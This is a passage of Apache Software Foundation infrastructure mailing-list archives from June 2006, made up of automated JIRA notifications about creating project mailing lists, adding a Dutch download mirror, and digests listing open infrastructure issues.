Mailing lists for Abdera MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Create Mailing lists for Abdera ------------------------------- Key: INFRA-829 URL: http://issues.apache.org/jira/browse/INFRA-829 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Mailing Lists Reporter: Paul Querna Please create the following lists under the incubator.apache.org domain: abdera-ppmc (moderated subscriptions, private) abdera-dev abdera-commits abdera-user -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 06 01:37:33 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55820 invoked from network); 6 Jun 2006 01:37:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 01:37:32 -0000 Received: (qmail 58617 invoked by uid 500); 6 Jun 2006 01:37:31 -0000 Delivered-To: [email protected] Received: (qmail 58359 invoked by uid 500); 6 Jun 2006 01:37:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58344 invoked by uid 99); 6 Jun 2006 01:37:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 18:37:29 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 18:37:29 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C3B1E71429F for <[email protected]>; Tue, 6 Jun 2006 01:36:29 +0000 (GMT) Message-ID: <28560783.1149557789783.JavaMail.jira@brutus> Date: Tue, 6 Jun 2006 01:36:29 +0000 (GMT+00:00) From: "Paul Querna (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-830) Add Abdera to Bugzilla MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Add Abdera to Bugzilla ---------------------- Key: INFRA-830 URL: http://issues.apache.org/jira/browse/INFRA-830 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Bugzilla Reporter: Paul Querna Need an Abdera project created in Bugzilla. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 06 01:45:33 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58904 invoked from network); 6 Jun 2006 01:45:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 01:45:33 -0000 Received: (qmail 67028 invoked by uid 500); 6 Jun 2006 01:45:31 -0000 Delivered-To: [email protected] Received: (qmail 66708 invoked by uid 500); 6 Jun 2006 01:45:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66697 invoked by uid 99); 6 Jun 2006 01:45:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 18:45:30 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 18:45:29 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2FCEE71429F for <[email protected]>; Tue, 6 Jun 2006 01:44:30 +0000 (GMT) Message-ID: <21074523.1149558270171.JavaMail.jira@brutus> Date: Tue, 6 Jun 2006 01:44:30 +0000 (GMT+00:00) From: "Paul Querna (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-829) Create Mailing lists for Abdera In-Reply-To: <26643223.1149556949768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-829?page=comments#action_12414890 ] Paul Querna commented on INFRA-829: ----------------------------------- Moderators for all 4 lists: [email protected] [email protected] > Create Mailing lists for Abdera > ------------------------------- > > Key: INFRA-829 > URL: http://issues.apache.org/jira/browse/INFRA-829 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Paul Querna > > Please create the following lists under the incubator.apache.org domain: > abdera-ppmc (moderated subscriptions, private) > abdera-dev > abdera-commits > abdera-user -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 06 03:48:35 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85205 invoked from network); 6 Jun 2006 03:48:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 03:48:33 -0000 Received: (qmail 89798 invoked by uid 500); 6 Jun 2006 03:48:31 -0000 Delivered-To: [email protected] Received: (qmail 89477 invoked by uid 500); 6 Jun 2006 03:48:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89465 invoked by uid 99); 6 Jun 2006 03:48:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 20:48:30 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 20:48:29 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 276F671429F for <[email protected]>; Tue, 6 Jun 2006 03:47:30 +0000 (GMT) Message-ID: <25965325.1149565650143.JavaMail.jira@brutus> Date: Tue, 6 Jun 2006 03:47:30 +0000 (GMT+00:00) From: "Joe Schaefer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-829) Create Mailing lists for Abdera In-Reply-To: <26643223.1149556949768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-829?page=all ] Joe Schaefer closed INFRA-829: ------------------------------ Resolution: Fixed Assign To: Joe Schaefer lists created > Create Mailing lists for Abdera > ------------------------------- > > Key: INFRA-829 > URL: http://issues.apache.org/jira/browse/INFRA-829 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Paul Querna > Assignee: Joe Schaefer > > Please create the following lists under the incubator.apache.org domain: > abdera-ppmc (moderated subscriptions, private) > abdera-dev > abdera-commits > abdera-user -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 06 12:36:20 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49269 invoked from network); 6 Jun 2006 12:36:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 12:36:19 -0000 Received: (qmail 89266 invoked by uid 500); 6 Jun 2006 12:35:59 -0000 Delivered-To: [email protected] Received: (qmail 88814 invoked by uid 500); 6 Jun 2006 12:35:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88586 invoked by uid 99); 6 Jun 2006 12:35:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 05:35:56 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 05:35:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4FB397142E8 for <[email protected]>; Tue, 6 Jun 2006 12:34:54 +0000 (GMT) Message-ID: <2765780.1149597294322.JavaMail.jira@brutus> Date: Tue, 6 Jun 2006 12:34:54 +0000 (GMT+00:00) From: "Jop Verhagen (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-831) New NL mirror MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New NL mirror ------------- Key: INFRA-831 URL: http://issues.apache.org/jira/browse/INFRA-831 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mirrors Environment: apache Reporter: Jop Verhagen URL of mirror -- http://apache.innostats.nl Country where the mirror is located -- NL Contact email address -- [email protected] Update frequency -- twice a day Rsync repository used -- rsync.eu.apache.org Approximate bandwidth -- 100Mbps I have followed the recommended configuration for my mirror -- Yes I have subscribed to the mirror maintainers mailing list -- Yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 06 17:20:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79199 invoked from network); 6 Jun 2006 17:20:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 17:20:36 -0000 Received: (qmail 99139 invoked by uid 500); 6 Jun 2006 17:20:32 -0000 Delivered-To: [email protected] Received: (qmail 98816 invoked by uid 500); 6 Jun 2006 17:20:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98804 invoked by uid 99); 6 Jun 2006 17:20:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 10:20:30 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 10:20:30 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C163171429F for <[email protected]>; Tue, 6 Jun 2006 17:19:29 +0000 (GMT) Message-ID: <25907211.1149614369774.JavaMail.jira@brutus> Date: Tue, 6 Jun 2006 17:19:29 +0000 (GMT+00:00) From: "Doug Cutting (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-832) create lucy mailing lists MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N create lucy mailing lists ------------------------- Key: INFRA-832 URL: http://issues.apache.org/jira/browse/INFRA-832 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Mailing Lists Reporter: Doug Cutting Can we please get mailing lists created for a new Lucene subproject? The mailing lists needed are: [email protected] [email protected] [email protected] The owners should be [email protected] and [email protected]. Thanks! Doug -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 07 00:31:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31045 invoked from network); 7 Jun 2006 00:31:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 00:31:50 -0000 Received: (qmail 39058 invoked by uid 500); 7 Jun 2006 00:31:43 -0000 Delivered-To: [email protected] Received: (qmail 38782 invoked by uid 500); 7 Jun 2006 00:31:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38748 invoked by uid 99); 7 Jun 2006 00:31:42 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 17:31:42 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 17:31:41 -0700 Received: from ajax (localhost [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id B1D47D49DB for <[email protected]>; Wed, 7 Jun 2006 01:31:19 +0100 (BST) Message-ID: <29551600.1149640279639.JavaMail.jira@ajax> Date: Wed, 7 Jun 2006 01:31:19 +0100 (BST) From: [email protected] To: [email protected] Subject: [jira] Subscription: Open INFRA issues MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Issue Subscription Filter: Open INFRA issues (61 issues) Subscriber: [email protected] Key Summary INFRA-772 Geronimo Project - create a ASF Confluence test space for documentation http://issues.apache.org/jira/browse/INFRA-772 INFRA-771 autoexport module for confluence access request for Cayenne http://issues.apache.org/jira/browse/INFRA-771 INFRA-769 Move Tobago out of incubator http://issues.apache.org/jira/browse/INFRA-769 INFRA-768 Missing HTML escaping in ViewCVS' svn diffs http://issues.apache.org/jira/browse/INFRA-768 INFRA-764 Solaris patch may be needed to support new disk http://issues.apache.org/jira/browse/INFRA-764 INFRA-763 Jira project for HttpComponents HttpCore http://issues.apache.org/jira/browse/INFRA-763 INFRA-761 Import Torque issues into JIRA http://issues.apache.org/jira/browse/INFRA-761 INFRA-760 JIRA Project For Cayenne http://issues.apache.org/jira/browse/INFRA-760 INFRA-749 SVN Repo for "ADF Faces" Podling http://issues.apache.org/jira/browse/INFRA-749 INFRA-744 Tapestry TLP setup http://issues.apache.org/jira/browse/INFRA-744 INFRA-740 issues.apache.org HTTP timeouts and infinite loops http://issues.apache.org/jira/browse/INFRA-740 INFRA-738 Create initial subscriber list for OFBiz lists, using input from OFBiz project http://issues.apache.org/jira/browse/INFRA-738 INFRA-734 Alias for commits to /xmlgraphics/commons http://issues.apache.org/jira/browse/INFRA-734 INFRA-726 Remove old Lucene @jakarta.apache.org lists http://issues.apache.org/jira/browse/INFRA-726 INFRA-718 Add mrdon to Incubator PMC http://issues.apache.org/jira/browse/INFRA-718 INFRA-713 Create and assist in migration of JIRA for OFBiz http://issues.apache.org/jira/browse/INFRA-713 INFRA-710 Nameserver entries for myfaces.org http://issues.apache.org/jira/browse/INFRA-710 INFRA-708 Rename/move of mailing list breaks archive URIs http://issues.apache.org/jira/browse/INFRA-708 INFRA-707 httpd servers sending charset of ISO-8859-1 http://issues.apache.org/jira/browse/INFRA-707 INFRA-705 create [email protected] to supercede [email protected] http://issues.apache.org/jira/browse/INFRA-705 INFRA-702 New mirror (NL) http://issues.apache.org/jira/browse/INFRA-702 INFRA-698 Monitoring lenya.zones server http://issues.apache.org/jira/browse/INFRA-698 INFRA-690 Please create new Wiki for the Public Relations Committee (PRC) at wiki.apache.org/Talks http://issues.apache.org/jira/browse/INFRA-690 INFRA-659 Export to Excel produces invalid data in Summary field http://issues.apache.org/jira/browse/INFRA-659 INFRA-624 svn --revprop svn:log changes not reflected in Jira issues http://issues.apache.org/jira/browse/INFRA-624 INFRA-608 Document Xserve installations http://issues.apache.org/jira/browse/INFRA-608 INFRA-607 Harden Xserve installations http://issues.apache.org/jira/browse/INFRA-607 INFRA-602 Configure Xserves as mail spool servers http://issues.apache.org/jira/browse/INFRA-602 INFRA-590 Need to hook committers/pmc commits up to the individual pmc lists http://issues.apache.org/jira/browse/INFRA-590 INFRA-589 Replicate SpamAssassin Bugzilla e-mail comment setup on Ajax http://issues.apache.org/jira/browse/INFRA-589 INFRA-568 Account creation process should take care of apcvs ownership http://issues.apache.org/jira/browse/INFRA-568 INFRA-559 JIRA (and Bugzilla?) can't handle non-latin characters http://issues.apache.org/jira/browse/INFRA-559 INFRA-558 please close the scarab tracker for Turbine 2 http://issues.apache.org/jira/browse/INFRA-558 INFRA-537 A few updates for the XML Graphics project http://issues.apache.org/jira/browse/INFRA-537 INFRA-445 Minotaur is not stripping the 'minotaur' part on outgoing e-mail http://issues.apache.org/jira/browse/INFRA-445 INFRA-443 setup xmlbeans-cxx subversion for incubator http://issues.apache.org/jira/browse/INFRA-443 INFRA-424 Install OpenSSL into /opt on the zones http://issues.apache.org/jira/browse/INFRA-424 INFRA-412 Implement proper mail-to-jira bridge http://issues.apache.org/jira/browse/INFRA-412 INFRA-407 Links on Saved searches Preferences tab are missing http://issues.apache.org/jira/browse/INFRA-407 INFRA-398 Turn off eyebrowse? http://issues.apache.org/jira/browse/INFRA-398 INFRA-397 Create a simple commandline tool for searching private e-mail archives http://issues.apache.org/jira/browse/INFRA-397 INFRA-391 Create a web application for creating and editing ~/.forward files http://issues.apache.org/jira/browse/INFRA-391 INFRA-371 point myfaces.org to myfaces.apache.org http://issues.apache.org/jira/browse/INFRA-371 INFRA-352 Tweak the message body for jira notifications http://issues.apache.org/jira/browse/INFRA-352 INFRA-348 Make account-mailer provide host information http://issues.apache.org/jira/browse/INFRA-348 INFRA-347 Install svn:infrastructure/trunk/tools on all our machines http://issues.apache.org/jira/browse/INFRA-347 INFRA-346 Seriously clean up the infrastructure website documentation http://issues.apache.org/jira/browse/INFRA-346 INFRA-345 Write a script to detect unused accounts http://issues.apache.org/jira/browse/INFRA-345 INFRA-343 Write a script to remove svn auth credentials from the user accounts on our servers http://issues.apache.org/jira/browse/INFRA-343 INFRA-342 Develop a CLA processing tool http://issues.apache.org/jira/browse/INFRA-342 INFRA-341 Standardised form for requesting standard resources http://issues.apache.org/jira/browse/INFRA-341 INFRA-338 Create an automated way to keep crontabs synced with SVN http://issues.apache.org/jira/browse/INFRA-338 INFRA-334 Document service checklist as part of www.apache.org/dev/ http://issues.apache.org/jira/browse/INFRA-334 INFRA-330 Jira periodic issue summaries should include assignees http://issues.apache.org/jira/browse/INFRA-330 INFRA-315 SRS patch should be applied when available (SPF fail with mailinglists broken) http://issues.apache.org/jira/browse/INFRA-315 INFRA-261 Wiki change notifications need to look like they did before http://issues.apache.org/jira/browse/INFRA-261 INFRA-250 Enable e-mail comments for Bugzilla http://issues.apache.org/jira/browse/INFRA-250 INFRA-235 RFE: magic "revision" keyword in bugzilla comments http://issues.apache.org/jira/browse/INFRA-235 INFRA-227 Enable email tracking for Bugzilla http://issues.apache.org/jira/browse/INFRA-227 INFRA-222 anti-virus filtering overzealous for one specific list http://issues.apache.org/jira/browse/INFRA-222 INFRA-210 svnmailer breaks utility of diffs contained in SVN patches http://issues.apache.org/jira/browse/INFRA-210 From [email protected] Wed Jun 07 01:33:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52739 invoked from network); 7 Jun 2006 01:33:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 01:33:38 -0000 Received: (qmail 96928 invoked by uid 500); 7 Jun 2006 01:33:33 -0000 Delivered-To: [email protected] Received: (qmail 96601 invoked by uid 500); 7 Jun 2006 01:33:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96590 invoked by uid 99); 7 Jun 2006 01:33:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 18:33:32 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Jun 2006 18:33:31 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4DE2A71429F for <[email protected]>; Wed, 7 Jun 2006 01:32:30 +0000 (GMT) Message-ID: <12038035.1149643950288.JavaMail.jira@brutus> Date: Wed, 7 Jun 2006 01:32:30 +0000 (GMT+00:00) From: [email protected] To: [email protected] Subject: [jira] Subscription: Open INFRA issues MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Issue Subscription Filter: Open INFRA issues (73 issues) Subscriber: [email protected] Key Summary INFRA-832 create lucy mailing lists http://issues.apache.org/jira/browse/INFRA-832 INFRA-831 New NL mirror http://issues.apache.org/jira/browse/INFRA-831 INFRA-830 Add Abdera to Bugzilla http://issues.apache.org/jira/browse/INFRA-830 INFRA-828 New / Renewed Mirror in USA http://issues.apache.org/jira/browse/INFRA-828 INFRA-827 New mirror - please add http://issues.apache.org/jira/browse/INFRA-827 INFRA-826 Mail archives out of sync http://issues.apache.org/jira/browse/INFRA-826 INFRA-825 Issue visibility not enabled in the form associated to the issue creation. http://issues.apache.org/jira/browse/INFRA-825 INFRA-824 Internal error when creating Tomcat 6 issue. http://issues.apache.org/jira/browse/INFRA-824 INFRA-823 Create HiveMind TLP http://issues.apache.org/jira/browse/INFRA-823 INFRA-822 New mirror located in Amsterdam, The Netherlands http://issues.apache.org/jira/browse/INFRA-822 INFRA-821 Disable weekly Bugzilla reports for Jakarta Commons http://issues.apache.org/jira/browse/INFRA-821 INFRA-820 new http mirror for apache.org with german location http://issues.apache.org/jira/browse/INFRA-820 INFRA-819 New Mirror http://issues.apache.org/jira/browse/INFRA-819 INFRA-818 Please add new mirror to list http://issues.apache.org/jira/browse/INFRA-818 INFRA-817 New Low Speed Mirror in Australia http://issues.apache.org/jira/browse/INFRA-817 INFRA-815 SPF Records for incubator.apache.org are wrong. http://issues.apache.org/jira/browse/INFRA-815 INFRA-814 New Apache mirror http://issues.apache.org/jira/browse/INFRA-814 INFRA-813 Import Jira projects into the main Jira http://issues.apache.org/jira/browse/INFRA-813 INFRA-809 New mirror in Taiwan,mirror.tw http://issues.apache.org/jira/browse/INFRA-809 INFRA-808 Install request: apr v1.2.7 Solaris PKG within the zones http://issues.apache.org/jira/browse/INFRA-808 INFRA-805 recent Subversion change(s) not in Jira http://issues.apache.org/jira/browse/INFRA-805 INFRA-800 New mirror in Argentina http://issues.apache.org/jira/browse/INFRA-800 INFRA-797 Create new mailing lists for HiveMind http://issues.apache.org/jira/browse/INFRA-797 INFRA-796 Move HiveMind wiki from Jakarta to top-level http://issues.apache.org/jira/browse/INFRA-796 INFRA-793 Add reply-to header to Tomcat digest lists http://issues.apache.org/jira/browse/INFRA-793 INFRA-782 Need to switch nameservers for apachecon.com urgently http://issues.apache.org/jira/browse/INFRA-782 INFRA-781 Please renew the mirror at our location http://issues.apache.org/jira/browse/INFRA-781 INFRA-777 Use wrapper to automatically restart Java services http://issues.apache.org/jira/browse/INFRA-777 INFRA-768 Missing HTML escaping in ViewCVS' svn diffs http://issues.apache.org/jira/browse/INFRA-768 INFRA-761 Import Torque issues into JIRA http://issues.apache.org/jira/browse/INFRA-761 INFRA-738 Create initial subscriber list for OFBiz lists, using input from OFBiz project http://issues.apache.org/jira/browse/INFRA-738 INFRA-734 Alias for commits to /xmlgraphics/commons http://issues.apache.org/jira/browse/INFRA-734 INFRA-726 Remove old Lucene @jakarta.apache.org lists http://issues.apache.org/jira/browse/INFRA-726 INFRA-710 Nameserver entries for myfaces.org http://issues.apache.org/jira/browse/INFRA-710 INFRA-708 Rename/move of mailing list breaks archive URIs http://issues.apache.org/jira/browse/INFRA-708 INFRA-705 create [email protected] to supercede [email protected] http://issues.apache.org/jira/browse/INFRA-705 INFRA-698 Monitoring lenya.zones server http://issues.apache.org/jira/browse/INFRA-698 INFRA-690 Please create new Wiki for the Public Relations Committee (PRC) at wiki.apache.org/Talks http://issues.apache.org/jira/browse/INFRA-690 INFRA-624 svn --revprop svn:log changes not reflected in Jira issues http://issues.apache.org/jira/browse/INFRA-624 INFRA-608 Document Xserve installations http://issues.apache.org/jira/browse/INFRA-608 INFRA-607 Harden Xserve installations http://issues.apache.org/jira/browse/INFRA-607 INFRA-602 Configure Xserves as mail spool servers http://issues.apache.org/jira/browse/INFRA-602 INFRA-589 Replicate SpamAssassin Bugzilla e-mail comment setup on Ajax http://issues.apache.org/jira/browse/INFRA-589 INFRA-568 Account creation process should take care of apcvs ownership http://issues.apache.org/jira/browse/INFRA-568 INFRA-559 JIRA (and Bugzilla?) can't handle non-latin characters http://issues.apache.org/jira/browse/INFRA-559 INFRA-558 please close the scarab tracker for Turbine 2 http://issues.apache.org/jira/browse/INFRA-558 INFRA-537 A few updates for the XML Graphics project http://issues.apache.org/jira/browse/INFRA-537 INFRA-443 setup xmlbeans-cxx subversion for incubator http://issues.apache.org/jira/browse/INFRA-443 INFRA-424 Install OpenSSL into /opt on the zones http://issues.apache.org/jira/browse/INFRA-424 INFRA-412 Implement proper mail-to-jira bridge http://issues.apache.org/jira/browse/INFRA-412 INFRA-407 Links on Saved searches Preferences tab are missing http://issues.apache.org/jira/browse/INFRA-407 INFRA-398 Turn off eyebrowse? http://issues.apache.org/jira/browse/INFRA-398 INFRA-397 Create a simple commandline tool for searching private e-mail archives http://issues.apache.org/jira/browse/INFRA-397 INFRA-391 Create a web application for creating and editing ~/.forward files http://issues.apache.org/jira/browse/INFRA-391 INFRA-371 point myfaces.org to myfaces.apache.org http://issues.apache.org/jira/browse/INFRA-371 INFRA-352 Tweak the message body for jira notifications http://issues.apache.org/jira/browse/INFRA-352 INFRA-348 Make account-mailer provide host information http://issues.apache.org/jira/browse/INFRA-348 INFRA-347 Install svn:infrastructure/trunk/tools on all our machines http://issues.apache.org/jira/browse/INFRA-347 INFRA-346 Seriously clean up the infrastructure website documentation http://issues.apache.org/jira/browse/INFRA-346 INFRA-345 Write a script to detect unused accounts http://issues.apache.org/jira/browse/INFRA-345 INFRA-343 Write a script to remove svn auth credentials from the user accounts on our servers http://issues.apache.org/jira/browse/INFRA-343 INFRA-342 Develop a CLA processing tool http://issues.apache.org/jira/browse/INFRA-342 INFRA-341 Standardised form for requesting standard resources http://issues.apache.org/jira/browse/INFRA-341 INFRA-338 Create an automated way to keep crontabs synced with SVN http://issues.apache.org/jira/browse/INFRA-338 INFRA-334 Document service checklist as part of www.apache.org/dev/ http://issues.apache.org/jira/browse/INFRA-334 INFRA-330 Jira periodic issue summaries should include assignees http://issues.apache.org/jira/browse/INFRA-330 INFRA-315 SRS patch should be applied when available (SPF fail with mailinglists broken) http://issues.apache.org/jira/browse/INFRA-315 INFRA-261 Wiki change notifications need to look like they did before http://issues.apache.org/jira/browse/INFRA-261 INFRA-250 Enable e-mail comments for Bugzilla http://issues.apache.org/jira/browse/INFRA-250 INFRA-235 RFE: magic "revision" keyword in bugzilla comments http://issues.apache.org/jira/browse/INFRA-235 INFRA-227 Enable email tracking for Bugzilla http://issues.apache.org/jira/browse/INFRA-227 INFRA-222 anti-virus filtering overzealous for one specific list http://issues.apache.org/jira/browse/INFRA-222 INFRA-210 svnmailer breaks utility of diffs contained in SVN patches http://issues.apache.org/jira/browse/INFRA-210 From [email protected] Wed Jun 07 04:22:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81777 invoked from network); 7 Jun 2006 04:22:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) 